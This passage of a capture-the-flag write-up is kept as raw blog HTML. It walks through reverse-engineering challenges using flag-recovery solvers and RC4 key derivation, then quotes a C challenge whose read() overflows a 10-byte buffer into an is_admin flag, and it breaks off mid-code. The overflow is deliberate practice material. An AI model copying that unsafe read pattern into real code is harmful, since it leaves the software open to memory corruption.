class=\"gatsby-resp-image-image\"\n            src=\"/static/6191c69fac5d5b621a661be85f3824f5/57dc1/image-20240615161131582.png\"\n            alt=\"image-20240615161131582\"\n            title=\"image-20240615161131582\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h3 
id=\"validate-input-two-characters-at-a-time\" style=\"position:relative;\"><a href=\"#validate-input-two-characters-at-a-time\" aria-label=\"validate input two characters at a time permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Validate Input Two Characters at a Time</h3>\n<p>The subsequent functions extract 2 characters from a hardcoded byte sequence and verify that they match 2 characters of the input string.</p>\n<p>I extracted the values being verified from the binary and created the following solver.</p>\n<p>Running this solver identified the correct flag as <code class=\"language-text\">ctf4b{c0ns7ruc70rs_3as3_h1d1ng_7h1ngs!}</code>.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\">flag <span class=\"token operator\">=</span> <span class=\"token string\">\"\"</span>\nf <span class=\"token operator\">=</span> <span class=\"token punctuation\">[</span><span class=\"token punctuation\">]</span>\nf<span class=\"token punctuation\">.</span>append<span class=\"token punctuation\">(</span><span class=\"token string\">\"c0_d4yk261hbosje893w5igzfrvaumqlptx7n\"</span><span class=\"token punctuation\">)</span>\nf<span class=\"token punctuation\">.</span>append<span class=\"token punctuation\">(</span><span class=\"token string\">\"oxnske1cgaiylz0mwfv7p9r32h6qj8bt4d_u5\"</span><span class=\"token punctuation\">)</span>\nf<span class=\"token punctuation\">.</span>append<span class=\"token punctuation\">(</span><span 
class=\"token string\">\"lzau7rvb9qh5_1ops6jg3ykf8x0emtcind24w\"</span><span class=\"token punctuation\">)</span>\nf<span class=\"token punctuation\">.</span>append<span class=\"token punctuation\">(</span><span class=\"token string\">\"9_xva4uchnkyi6wb2ld507p8g3stfej1rzqmo\"</span><span class=\"token punctuation\">)</span>\nf<span class=\"token punctuation\">.</span>append<span class=\"token punctuation\">(</span><span class=\"token string\">\"r8x9wn65701zvbdfp4ioqc2hy_juegkmatls3\"</span><span class=\"token punctuation\">)</span>\nf<span class=\"token punctuation\">.</span>append<span class=\"token punctuation\">(</span><span class=\"token string\">\"tufij3cykhrsl841qo6_0dwg529zanmbpvxe7\"</span><span class=\"token punctuation\">)</span>\nf<span class=\"token punctuation\">.</span>append<span class=\"token punctuation\">(</span><span class=\"token string\">\"b0i21csjhqug_3erat9f6mx854pyol7zkvdwn\"</span><span class=\"token punctuation\">)</span>\nf<span class=\"token punctuation\">.</span>append<span class=\"token punctuation\">(</span><span class=\"token string\">\"17zv5h6wjgbqerastioc294n0lxu38fdk_ypm\"</span><span class=\"token punctuation\">)</span>\nf<span class=\"token punctuation\">.</span>append<span class=\"token punctuation\">(</span><span class=\"token string\">\"1cgovr4tzpnj29ay3_8wk7li6uqfmhe50bdsx\"</span><span class=\"token punctuation\">)</span>\nf<span class=\"token punctuation\">.</span>append<span class=\"token punctuation\">(</span><span class=\"token string\">\"3icj_go9qd0svxubefh14ktywpzma2l7nr685\"</span><span class=\"token punctuation\">)</span>\nf<span class=\"token punctuation\">.</span>append<span class=\"token punctuation\">(</span><span class=\"token string\">\"c7l9532k0avfxso4uzipd18egbnyw6rm_tqjh\"</span><span class=\"token punctuation\">)</span>\nf<span class=\"token punctuation\">.</span>append<span class=\"token punctuation\">(</span><span class=\"token string\">\"l8s0xb4i1frkv6a92j5eycng3mwpzduqth_7o\"</span><span class=\"token 
punctuation\">)</span>\nf<span class=\"token punctuation\">.</span>append<span class=\"token punctuation\">(</span><span class=\"token string\">\"l539rbmoifye0u6dj1pw8nqt_74sz2gkvaxch\"</span><span class=\"token punctuation\">)</span>\nf<span class=\"token punctuation\">.</span>append<span class=\"token punctuation\">(</span><span class=\"token string\">\"aj_d29wcrqiok53b7tyn0p6zvfh1lxgum48es\"</span><span class=\"token punctuation\">)</span>\nf<span class=\"token punctuation\">.</span>append<span class=\"token punctuation\">(</span><span class=\"token string\">\"3mq16t9yfs842cbvlw5j7k0prohengduzx_ai\"</span><span class=\"token punctuation\">)</span>\nf<span class=\"token punctuation\">.</span>append<span class=\"token punctuation\">(</span><span class=\"token string\">\"_k6nj8hyxvzcgr1bu2petf5qwl09ids!om347a\"</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token keyword\">for</span> i <span class=\"token keyword\">in</span> <span class=\"token builtin\">range</span><span class=\"token punctuation\">(</span><span class=\"token number\">16</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    flag <span class=\"token operator\">+=</span> f<span class=\"token punctuation\">[</span>i<span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span><span class=\"token number\">2</span><span class=\"token operator\">*</span>i<span class=\"token punctuation\">]</span> <span class=\"token operator\">+</span> f<span class=\"token punctuation\">[</span>i<span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span><span class=\"token number\">2</span><span class=\"token operator\">*</span>i<span class=\"token operator\">+</span><span class=\"token number\">1</span><span class=\"token punctuation\">]</span>\n\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span>flag<span class=\"token punctuation\">)</span>\n<span class=\"token comment\"># 
c0ns7ruc70rs_3as3_h1d1ng_7h1ngs!</span></code></pre></div>\n<h2 id=\"former-seccomprev\" style=\"position:relative;\"><a href=\"#former-seccomprev\" aria-label=\"former seccomprev permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>former-seccomp(Rev)</h2>\n<blockquote>\n<p>I tried creating a custom system call for flag checking.</p>\n</blockquote>\n<p>Analyzing the challenge binary, I found that it first calls fork, creating a child process that is a copy of itself.</p>\n<p>On the child process side, the check function shown below is called, and it appears to verify the flag by executing system call 0xcafe with the received flag string as an argument.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 629px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/3eb971a0821c2c0558f0206edf806ba5/63a68/image-20240615171603286.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 117.08333333333334%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/3eb971a0821c2c0558f0206edf806ba5/8ac56/image-20240615171603286.webp 
240w,\n/static/3eb971a0821c2c0558f0206edf806ba5/d3be9/image-20240615171603286.webp 480w,\n/static/3eb971a0821c2c0558f0206edf806ba5/abae2/image-20240615171603286.webp 629w\"\n              sizes=\"(max-width: 629px) 100vw, 629px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/3eb971a0821c2c0558f0206edf806ba5/8ff5a/image-20240615171603286.png 240w,\n/static/3eb971a0821c2c0558f0206edf806ba5/e85cb/image-20240615171603286.png 480w,\n/static/3eb971a0821c2c0558f0206edf806ba5/63a68/image-20240615171603286.png 629w\"\n            sizes=\"(max-width: 629px) 100vw, 629px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/3eb971a0821c2c0558f0206edf806ba5/63a68/image-20240615171603286.png\"\n            alt=\"image-20240615171603286\"\n            title=\"image-20240615171603286\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>On the parent process side, some function is called with the child process’s PID as an argument.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 444px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/d4dd2736a58258f75906e4d417a3011d/9b7bd/image-20240615171546469.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 82.5%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              
srcset=\"/static/d4dd2736a58258f75906e4d417a3011d/8ac56/image-20240615171546469.webp 240w,\n/static/d4dd2736a58258f75906e4d417a3011d/ced2a/image-20240615171546469.webp 444w\"\n              sizes=\"(max-width: 444px) 100vw, 444px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/d4dd2736a58258f75906e4d417a3011d/8ff5a/image-20240615171546469.png 240w,\n/static/d4dd2736a58258f75906e4d417a3011d/9b7bd/image-20240615171546469.png 444w\"\n            sizes=\"(max-width: 444px) 100vw, 444px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/d4dd2736a58258f75906e4d417a3011d/9b7bd/image-20240615171546469.png\"\n            alt=\"image-20240615171546469\"\n            title=\"image-20240615171546469\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>This function is defined to call the following code when system call 0xcafe is triggered.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 743px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/b2e65ee39d336559d28a25f7aa1df66c/f2793/image-20240615171618621.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 37.083333333333336%; position: relative; bottom: 0; left: 0; background-image: 
url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABDUlEQVQoz41R2U7DMBD059jx7dh1SpK2CFIhkCgggYTE///GsGuqcLzQh/H6nJ0ZC+8cQorwIcAFD0tQSq3ouo5qt87/g+AhRY9aEkpybe68h0+hVSW/iS4hFVprlJyxKRm1FsQYYK1tMNaAzy9RthIaY0gVqwnwMcJRBJEisETGZ0zMlqWUTaFkSLWu2cHPiIQ+W4lElpNHqZWUWeqm4Kymfd9iKJmbWXhnEL35yttoWBLAza3jNxoi0Gew3XEouNpW1GGgusVIxNOmYCDknOhOj0TKe0Luqea+iUh9ao7i+WPFfrfDcrzFkbAsN7hbrvF2esLH8yveH19wun/A/nDAOE6Ypr+Yf63necYn7D7bISv9VqYAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/b2e65ee39d336559d28a25f7aa1df66c/8ac56/image-20240615171618621.webp 240w,\n/static/b2e65ee39d336559d28a25f7aa1df66c/d3be9/image-20240615171618621.webp 480w,\n/static/b2e65ee39d336559d28a25f7aa1df66c/53666/image-20240615171618621.webp 743w\"\n              sizes=\"(max-width: 743px) 100vw, 743px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/b2e65ee39d336559d28a25f7aa1df66c/8ff5a/image-20240615171618621.png 240w,\n/static/b2e65ee39d336559d28a25f7aa1df66c/e85cb/image-20240615171618621.png 480w,\n/static/b2e65ee39d336559d28a25f7aa1df66c/f2793/image-20240615171618621.png 743w\"\n            sizes=\"(max-width: 743px) 100vw, 743px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/b2e65ee39d336559d28a25f7aa1df66c/f2793/image-20240615171618621.png\"\n            alt=\"image-20240615171618621\"\n            title=\"image-20240615171618621\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>The callback function called within this system call appears to generate a key from a hardcoded seed, then decrypt a hardcoded ciphertext using a decryption function and verify whether the result 
matches the input.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 761px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/3f5067115416a2885d9e251d67c555f4/8c857/image-20240615171527179.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 101.66666666666666%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAUCAYAAACNiR0NAAAACXBIWXMAAAsTAAALEwEAmpwYAAACAUlEQVQ4y51UWbLbMAzzbV5sa1+8pOmbrPXr/Q+EgnLsSZq2E/cDIw8lQyBBqrper7hcLrhMP1dMXxN+TDdcbzecTqdNqOqmgdYaRitYa9A0Neq6xm63w+7jY143oFJKwXuHLgUMQ4ZzFtZbaGMKccMLt6BSbUuFVEciRaUSFKKFbCspFbZI0aFt2jnYvh7aQlq1VCjo+4wQA1zws0LWo+BB6TvEK6Fn3Zz3NMYiOg0fI2xKMM69rVDOlRoKoazicgwOhmUQUxTR0rRF3b+wKlyYVasQqTJFT3NmMkXFhZSXGV5WzDPsCqvKt6jXIUJLFkvbhBCYrkdiesPQs5Ydctch9T3SMCDmDpF7mfHAMiTWObPFIteUM2I37wuHI3F1OBwguN2uOJ5POE9f+DydC74Ljkd8nrmeL/jGc+O4x7jfY0+M44j9gnusqus595xnhy0VS4qN1OWPdaqfUPYeTVlc1iy+o8MpWORgS29mGuR5ieMkCaQsXbTFuC55eA6D7AsM/5WpWwnFZWN0GT0h9c4geMOYKWRlj4iMlz1COkHqZu5j+qRQ2EV24G25S5yY9q12eWmbhbC9z7S0TZ99eYHKbG9o6idC6UNJq6c6SWmJ/42wFkOaev1+UigfMiXyfKnfJmPLHK+E8rhqqrNGv74uW58vmVVxTNwV1/7nDXzELwXKZkjd7lt3AAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/3f5067115416a2885d9e251d67c555f4/8ac56/image-20240615171527179.webp 240w,\n/static/3f5067115416a2885d9e251d67c555f4/d3be9/image-20240615171527179.webp 480w,\n/static/3f5067115416a2885d9e251d67c555f4/6e34c/image-20240615171527179.webp 761w\"\n              sizes=\"(max-width: 761px) 100vw, 761px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/3f5067115416a2885d9e251d67c555f4/8ff5a/image-20240615171527179.png 
240w,\n/static/3f5067115416a2885d9e251d67c555f4/e85cb/image-20240615171527179.png 480w,\n/static/3f5067115416a2885d9e251d67c555f4/8c857/image-20240615171527179.png 761w\"\n            sizes=\"(max-width: 761px) 100vw, 761px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/3f5067115416a2885d9e251d67c555f4/8c857/image-20240615171527179.png\"\n            alt=\"image-20240615171527179\"\n            title=\"image-20240615171527179\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Looking at the decryption function implementation, it was clearly RC4, so I renamed it to rc4.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 900px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/3c44ed3c0ca02456a7f58b45e3025f9b/1cfc2/image-20240615171633672.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 82.91666666666667%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/3c44ed3c0ca02456a7f58b45e3025f9b/8ac56/image-20240615171633672.webp 240w,\n/static/3c44ed3c0ca02456a7f58b45e3025f9b/d3be9/image-20240615171633672.webp 480w,\n/static/3c44ed3c0ca02456a7f58b45e3025f9b/131f1/image-20240615171633672.webp 900w\"\n              sizes=\"(max-width: 900px) 100vw, 900px\"\n              type=\"image/webp\"\n            />\n          <source\n            
srcset=\"/static/3c44ed3c0ca02456a7f58b45e3025f9b/8ff5a/image-20240615171633672.png 240w,\n/static/3c44ed3c0ca02456a7f58b45e3025f9b/e85cb/image-20240615171633672.png 480w,\n/static/3c44ed3c0ca02456a7f58b45e3025f9b/1cfc2/image-20240615171633672.png 900w\"\n            sizes=\"(max-width: 900px) 100vw, 900px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/3c44ed3c0ca02456a7f58b45e3025f9b/1cfc2/image-20240615171633672.png\"\n            alt=\"image-20240615171633672\"\n            title=\"image-20240615171633672\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>To obtain the flag, I first generated the key from the seed using the following code.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\">_4010 <span class=\"token operator\">=</span> <span class=\"token punctuation\">[</span><span class=\"token number\">0xa5</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0xd2</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0xbc</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x02</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0xb2</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x7c</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x86</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x38</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x17</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0xb1</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x38</span><span class=\"token 
punctuation\">,</span> <span class=\"token number\">0xc6</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0xe4</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x5c</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x1f</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0xa0</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x9d</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x96</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0xd1</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0xf0</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x4b</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0xa6</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0xa6</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x5c</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x64</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0xb7</span><span class=\"token punctuation\">]</span>\n_4030 <span class=\"token operator\">=</span> <span class=\"token punctuation\">[</span><span class=\"token number\">0x43</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x55</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x44</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x17</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x46</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x1f</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x14</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x17</span><span class=\"token 
punctuation\">,</span> <span class=\"token number\">0x1a</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x1d</span><span class=\"token punctuation\">]</span>\n\nk <span class=\"token operator\">=</span> <span class=\"token number\">0</span>\n<span class=\"token keyword\">while</span> <span class=\"token boolean\">True</span><span class=\"token punctuation\">:</span>\n    <span class=\"token keyword\">if</span> k <span class=\"token operator\">>=</span> <span class=\"token builtin\">len</span><span class=\"token punctuation\">(</span>_4030<span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n        <span class=\"token keyword\">break</span>\n    _4030<span class=\"token punctuation\">[</span>k<span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span>k<span class=\"token operator\">+</span><span class=\"token number\">0x20</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">^</span> _4030<span class=\"token punctuation\">[</span>k<span class=\"token punctuation\">]</span>\n    k <span class=\"token operator\">+=</span> <span class=\"token number\">1</span>\n\n<span class=\"token keyword\">for</span> i <span class=\"token keyword\">in</span> _4030<span class=\"token punctuation\">:</span>\n    <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token builtin\">hex</span><span class=\"token punctuation\">(</span>i<span class=\"token punctuation\">)</span><span class=\"token punctuation\">[</span><span class=\"token number\">2</span><span class=\"token punctuation\">:</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>end<span class=\"token operator\">=</span><span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span></code></pre></div>\n<p>Then, by performing RC4 decryption using the generated key and 
ciphertext, I obtained the flag.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/e4ea391aff9a7566fbf26ec1bf8aa8bf/2130b/image-20240615171046653.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 57.50000000000001%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAAsTAAALEwEAmpwYAAABEElEQVQoz5WTi46DIBBF/f9fXDdq65OqFdBBEb0Fmm1227VVk5MhMDkMkzGoOwapODh1EB6OJIvwnYRgF4Z+6DHQ8AIp8qiRIKRAXmSI4ghB3ISoqcRlKB6wPkfOT2ivLQQX4Jz/QQiJcRzvqHtUNhIRgqrPUCsrpMKKCzR27WLZp1hWg6NfEDVfSLsYhTgj5TGSNkQuTijlGdpon7Su626C6lr6HtJke6UlhOqgZoKcOswfhP9WSLrHaJSFfJz8WsHtm8U8hLuf/O7wR3RIaIvffNKyLMd7+FzB76qc8Ijso/B5b3cPt4RSSjuwCsYYaK03cYNd17UdePFeyBhD27Y+0f0F8zy/4C5zwqqqfN4N4CqtFHtIk4kAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/e4ea391aff9a7566fbf26ec1bf8aa8bf/8ac56/image-20240615171046653.webp 240w,\n/static/e4ea391aff9a7566fbf26ec1bf8aa8bf/d3be9/image-20240615171046653.webp 480w,\n/static/e4ea391aff9a7566fbf26ec1bf8aa8bf/e46b2/image-20240615171046653.webp 960w,\n/static/e4ea391aff9a7566fbf26ec1bf8aa8bf/7bb49/image-20240615171046653.webp 1271w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/e4ea391aff9a7566fbf26ec1bf8aa8bf/8ff5a/image-20240615171046653.png 240w,\n/static/e4ea391aff9a7566fbf26ec1bf8aa8bf/e85cb/image-20240615171046653.png 480w,\n/static/e4ea391aff9a7566fbf26ec1bf8aa8bf/d9199/image-20240615171046653.png 
960w,\n/static/e4ea391aff9a7566fbf26ec1bf8aa8bf/2130b/image-20240615171046653.png 1271w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/e4ea391aff9a7566fbf26ec1bf8aa8bf/d9199/image-20240615171046653.png\"\n            alt=\"image-20240615171046653\"\n            title=\"image-20240615171046653\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>It was listed as Hard difficulty, but I was able to solve it at a glance, so my Rev skills may have improved a bit.</p>\n<h2 id=\"simpleoverflowpwn\" style=\"position:relative;\"><a href=\"#simpleoverflowpwn\" aria-label=\"simpleoverflowpwn permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>simpleoverflow(Pwn)</h2>\n<blockquote>\n<p>In C, 0 is treated as False and any other value as True.</p>\n</blockquote>\n<p>This was a super-easy challenge.</p>\n<p>The following source code is provided for the challenge binary.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;stdio.h></span></span>\n<span class=\"token macro property\"><span 
class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;stdlib.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;unistd.h></span></span>\n\n<span class=\"token keyword\">int</span> <span class=\"token function\">main</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n  <span class=\"token keyword\">char</span> buf<span class=\"token punctuation\">[</span><span class=\"token number\">10</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">{</span><span class=\"token number\">0</span><span class=\"token punctuation\">}</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">int</span> is_admin <span class=\"token operator\">=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"name:\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">read</span><span class=\"token punctuation\">(</span><span class=\"token number\">0</span><span class=\"token punctuation\">,</span> buf<span class=\"token punctuation\">,</span> <span class=\"token number\">0x10</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Hello, %s\\n\"</span><span class=\"token punctuation\">,</span> buf<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">if</span> <span class=\"token 
punctuation\">(</span><span class=\"token operator\">!</span>is_admin<span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token function\">puts</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"You are not admin. bye\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span> <span class=\"token keyword\">else</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token function\">system</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"/bin/cat ./flag.txt\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>\n  <span class=\"token keyword\">return</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token keyword\">__attribute__</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span>constructor<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token keyword\">void</span> <span class=\"token function\">init</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span 